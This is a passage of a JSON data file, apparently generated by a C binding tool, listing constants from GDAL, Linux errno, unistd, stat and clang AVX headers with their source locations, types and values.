}, "value": 1 }, { "tag": "const", "name": "USE_GCC_VISIBILITY_FLAG", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:317:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "VSI_FOPEN64", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:320:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_CMP_UNORD_S", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1579:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 19 }, { "tag": "const", "name": "CPL_PROGRESS_H_INCLUDED", "ns": 0, "location": "/usr/include/gdal/cpl_progress.h:31:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__TIME64_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/time64.h:30:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "ENOSR", "ns": 0, "location": "/usr/include/asm-generic/errno.h:46:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 63 }, { "tag": "const", "name": "_CMP_LE_OQ", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1578:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 18 }, { "tag": "const", "name": "ETIME", "ns": 0, "location": "/usr/include/asm-generic/errno.h:45:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 62 }, { "tag": "const", "name": "EMULTIHOP", "ns": 0, "location": "/usr/include/asm-generic/errno.h:55:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 72 }, { "tag": "const", "name": "ENONET", "ns": 0, "location": "/usr/include/asm-generic/errno.h:47:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 64 }, { "tag": "const", "name": "VSI_FSEEK64", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:323:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_MKNOD_VER_LINUX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stat.h:41:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "EPROTO", "ns": 0, "location": "/usr/include/asm-generic/errno.h:54:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 71 }, { "tag": "const", "name": "_CMP_EQ_OS", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1576:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 16 }, { "tag": "const", "name": "ESRMNT", "ns": 0, "location": "/usr/include/asm-generic/errno.h:52:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 69 }, { "tag": "const", "name": "VSI_FTELL64", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:326:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_CMP_TRUE_UQ", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1575:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 15 }, { "tag": "const", "name": "_STAT_VER_KERNEL", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stat.h:37:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "EADV", "ns": 0, "location": "/usr/include/asm-generic/errno.h:51:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 68 }, { "tag": "const", "name": "_CMP_GT_OS", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1574:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 14 }, { "tag": "const", "name": "_STAT_VER_LINUX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stat.h:38:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "ENOTUNIQ", "ns": 0, "location": "/usr/include/asm-generic/errno.h:59:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 76 }, { "tag": "const", "name": "PACKAGE_BUGREPORT", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:284:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "const", "name": "ECOMM", "ns": 0, "location": "/usr/include/asm-generic/errno.h:53:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 70 }, { "tag": "const", "name": "__SSIZE_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:73:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "EOVERFLOW", "ns": 0, "location": "/usr/include/asm-generic/errno.h:58:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 75 }, { "tag": "const", "name": "PACKAGE_NAME", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:287:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "const", "name": "__CPU_MASK_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:74:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "EBADFD", "ns": 0, "location": "/usr/include/asm-generic/errno.h:60:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 77 }, { "tag": "const", "name": "PACKAGE_STRING", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:290:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "const", "name": "__BLKSIZE_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:71:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "EBADMSG", "ns": 0, "location": "/usr/include/asm-generic/errno.h:57:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 74 }, { "tag": "const", "name": "PACKAGE_TARNAME", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:293:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "const", "name": "__FSID_T_TYPE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:72:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "EDOTDOT", "ns": 0, "location": "/usr/include/asm-generic/errno.h:56:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 73 }, { "tag": "const", "name": "PACKAGE_URL", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:296:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "const", "name": "_CMP_NGE_US", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1569:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 9 }, { "tag": "const", "name": "_CMP_FALSE_OQ", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1571:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 11 }, { "tag": "const", "name": "ELIBMAX", "ns": 0, "location": "/usr/include/asm-generic/errno.h:65:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 82 }, { "tag": "const", "name": "PACKAGE_VERSION", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:299:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "const", "name": "_MATH_H", "ns": 0, "location": "/usr/include/math.h:24:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "ELIBBAD", "ns": 0, "location": "/usr/include/asm-generic/errno.h:63:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 80 }, { "tag": "const", "name": "SIZEOF_INT", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:302:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "__FD_SETSIZE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:92:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1024 }, { "tag": "const", "name": "ELIBACC", "ns": 0, "location": "/usr/include/asm-generic/errno.h:62:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 79 }, { "tag": "const", "name": "__RLIM_T_MATCHES_RLIM64_T", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:86:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "SIZEOF_UNSIGNED_LONG", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:305:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "__OFF_T_MATCHES_OFF64_T", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:80:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_CMP_NLE_US", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1566:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 6 }, { "tag": "const", "name": "SIZEOF_VOIDP", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:308:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "__INO_T_MATCHES_INO64_T", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/typesizes.h:83:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "EUSERS", "ns": 0, "location": "/usr/include/asm-generic/errno.h:70:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 87 }, { "tag": "const", "name": "EREMCHG", "ns": 0, "location": "/usr/include/asm-generic/errno.h:61:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 78 }, { "tag": "const", "name": "_CMP_NEQ_UQ", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1564:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "ESTRPIPE", "ns": 0, "location": "/usr/include/asm-generic/errno.h:69:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 86 }, { "tag": "const", "name": "ERESTART", "ns": 0, "location": "/usr/include/asm-generic/errno.h:68:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 85 }, { "tag": "const", "name": "_CMP_UNORD_Q", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1563:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 3 }, { "tag": "const", "name": "_CMP_NEQ_OQ", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1572:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 12 }, { "tag": "const", "name": "_CMP_NGT_US", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1570:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 10 }, { "tag": "const", "name": "EILSEQ", "ns": 0, "location": "/usr/include/asm-generic/errno.h:67:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 84 }, { "tag": "const", "name": "ELIBSCN", "ns": 0, "location": "/usr/include/asm-generic/errno.h:64:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 81 }, { "tag": "const", "name": "VALIDATE_POINTER_ERR", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:205:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 3 }, { "tag": "const", "name": "_CMP_EQ_OQ", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1560:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "_CMP_LT_OS", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1561:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "ELIBEXEC", "ns": 0, "location": "/usr/include/asm-generic/errno.h:66:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 83 }, { "tag": "const", "name": "_CMP_LE_OS", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1562:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "EPROTOTYPE", "ns": 0, "location": "/usr/include/asm-generic/errno.h:74:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 91 }, { "tag": "const", "name": "_CMP_NLT_US", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1565:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 5 }, { "tag": "const", "name": "_CMP_LT_OQ", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1577:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 17 }, { "tag": "const", "name": "EMSGSIZE", "ns": 0, "location": "/usr/include/asm-generic/errno.h:73:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 90 }, { "tag": "const", "name": "F_TEST", "ns": 0, "location": "/usr/include/unistd.h:1076:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 3 }, { "tag": "const", "name": "_CMP_ORD_Q", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1567:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 7 }, { "tag": "const", "name": "EDESTADDRREQ", "ns": 0, "location": "/usr/include/asm-generic/errno.h:72:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 89 }, { "tag": "const", "name": "ENOTSOCK", "ns": 0, "location": "/usr/include/asm-generic/errno.h:71:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 88 }, { "tag": "const", "name": "_CMP_EQ_UQ", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1568:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "VSI_FTRUNCATE64", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:329:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "EPFNOSUPPORT", "ns": 0, "location": "/usr/include/asm-generic/errno.h:79:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 96 }, { "tag": "const", "name": "_POSIX2_C_BIND", "ns": 0, "location": "/usr/include/unistd.h:74:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "EOPNOTSUPP", "ns": 0, "location": "/usr/include/asm-generic/errno.h:78:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 95 }, { "tag": "const", "name": "CPL_VIRTUAL_MEM_INCLUDED", "ns": 0, "location": "/usr/include/gdal/cpl_virtualmem.h:32:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "ESOCKTNOSUPPORT", "ns": 0, "location": "/usr/include/asm-generic/errno.h:77:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 94 }, { "tag": "const", "name": "_POSIX2_LOCALEDEF", "ns": 0, "location": "/usr/include/unistd.h:86:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "_POSIX2_SW_DEV", "ns": 0, "location": "/usr/include/unistd.h:82:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "VSI_LARGE_API_SUPPORTED", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:332:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "EPROTONOSUPPORT", "ns": 0, "location": "/usr/include/asm-generic/errno.h:76:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 93 }, { "tag": "const", "name": "_XOPEN_VERSION", "ns": 0, "location": "/usr/include/unistd.h:90:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 700 }, { "tag": "const", "name": "VSI_STAT64", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:338:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "ENOPROTOOPT", "ns": 0, "location": "/usr/include/asm-generic/errno.h:75:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 92 }, { "tag": "const", "name": "VSI_STAT64_T", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:341:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__POSIX2_THIS_VERSION", "ns": 0, "location": "/usr/include/unistd.h:53:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "ENETDOWN", "ns": 0, "location": "/usr/include/asm-generic/errno.h:83:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 100 }, { "tag": "const", "name": "ODsCRandomLayerRead", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:778:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "RandomLayerRead" }, { "tag": "const", "name": "_POSIX2_VERSION", "ns": 0, "location": "/usr/include/unistd.h:67:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "ENETUNREACH", "ns": 0, "location": "/usr/include/asm-generic/errno.h:84:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 101 }, { "tag": "const", "name": "EADDRNOTAVAIL", "ns": 0, "location": "/usr/include/asm-generic/errno.h:82:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 99 }, { "tag": "const", "name": "_POSIX2_C_DEV", "ns": 0, "location": "/usr/include/unistd.h:78:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "_SYS_STAT_H", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:23:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "EADDRINUSE", "ns": 0, "location": "/usr/include/asm-generic/errno.h:81:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 98 }, { "tag": "const", "name": "CPL_VSI_H_INCLUDED", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:33:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "ODrCCreateDataSource", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:781:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "CreateDataSource" }, { "tag": "const", "name": "_POSIX_VERSION", "ns": 0, "location": "/usr/include/unistd.h:34:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "EAFNOSUPPORT", "ns": 0, "location": "/usr/include/asm-generic/errno.h:80:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 97 }, { "tag": "const", "name": "_POSIX_MEMLOCK", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:41:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "_UNISTD_H", "ns": 0, "location": "/usr/include/unistd.h:23:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "F_LOCK", "ns": 0, "location": "/usr/include/unistd.h:1074:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "F_TLOCK", "ns": 0, "location": "/usr/include/unistd.h:1075:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "_XOPEN_XPG2", "ns": 0, "location": "/usr/include/unistd.h:103:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_MAPPED_FILES", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:38:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "_BITS_STAT_H", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stat.h:23:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_XOPEN_XCU_VERSION", "ns": 0, "location": "/usr/include/unistd.h:100:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "_POSIX2_C_VERSION", "ns": 0, "location": "/usr/include/unistd.h:70:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "_POSIX_FSYNC", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:35:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "_CMP_GE_OS", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1573:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 13 }, { "tag": "const", "name": "_STAT_VER", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stat.h:44:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_SYNCHRONIZED_IO", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:32:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "_POSIX_VDISABLE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:54:9", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "__S_IWRITE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stat.h:202:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 128 }, { "tag": "const", "name": "ODrCDeleteDataSource", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:782:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DeleteDataSource" }, { "tag": "const", "name": "__S_IREAD", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stat.h:201:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 256 }, { "tag": "const", "name": "__S_IEXEC", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stat.h:203:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 64 }, { "tag": "const", "name": "_POSIX_CHOWN_RESTRICTED", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:50:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "__S_ISGID", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stat.h:199:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1024 }, { "tag": "const", "name": "ODsCRandomLayerWrite", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:779:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "RandomLayerWrite " }, { "tag": "const", "name": "__S_ISVTX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stat.h:200:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 512 }, { "tag": "const", "name": "_POSIX_MEMORY_PROTECTION", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:47:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "_POSIX_MEMLOCK_RANGE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:44:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "_XOPEN_LEGACY", "ns": 0, "location": "/usr/include/unistd.h:115:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "ERANGE", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:38:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 34 }, { "tag": "const", "name": "EDEADLK", "ns": 0, "location": "/usr/include/asm-generic/errno.h:7:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 35 }, { "tag": "const", "name": "UTIME_NOW", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stat.h:206:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1073741823 }, { "tag": "const", "name": "_XOPEN_ENH_I18N", "ns": 0, "location": "/usr/include/unistd.h:112:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "EMLINK", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:35:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 31 }, { "tag": "const", "name": "F_ULOCK", "ns": 0, "location": "/usr/include/unistd.h:1073:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "_XOPEN_UNIX", "ns": 0, "location": "/usr/include/unistd.h:108:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_XOPEN_XPG3", "ns": 0, "location": "/usr/include/unistd.h:104:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "EPIPE", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:36:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 32 }, { "tag": "const", "name": "EDOM", "ns": 0, "location": "/usr/include/asm-generic/errno-base.h:37:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 33 }, { "tag": "const", "name": "_XOPEN_XPG4", "ns": 0, "location": "/usr/include/unistd.h:105:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__S_ISUID", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stat.h:198:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2048 }, { "tag": "const", "name": "_POSIX_PRIORITY_SCHEDULING", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:29:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "ENOTEMPTY", "ns": 0, "location": "/usr/include/asm-generic/errno.h:20:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 39 }, { "tag": "const", "name": "ELOOP", "ns": 0, "location": "/usr/include/asm-generic/errno.h:21:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 40 }, { "tag": "const", "name": "_POSIX_SAVED_IDS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:26:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "ENAMETOOLONG", "ns": 0, "location": "/usr/include/asm-generic/errno.h:8:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 36 }, { "tag": "const", "name": "ENOLCK", "ns": 0, "location": "/usr/include/asm-generic/errno.h:9:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 37 }, { "tag": "const", "name": "_POSIX_JOB_CONTROL", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:23:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "ENOSYS", "ns": 0, "location": "/usr/include/asm-generic/errno.h:18:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 38 }, { "tag": "const", "name": "_POSIX_THREAD_PRIO_PROTECT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:89:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, 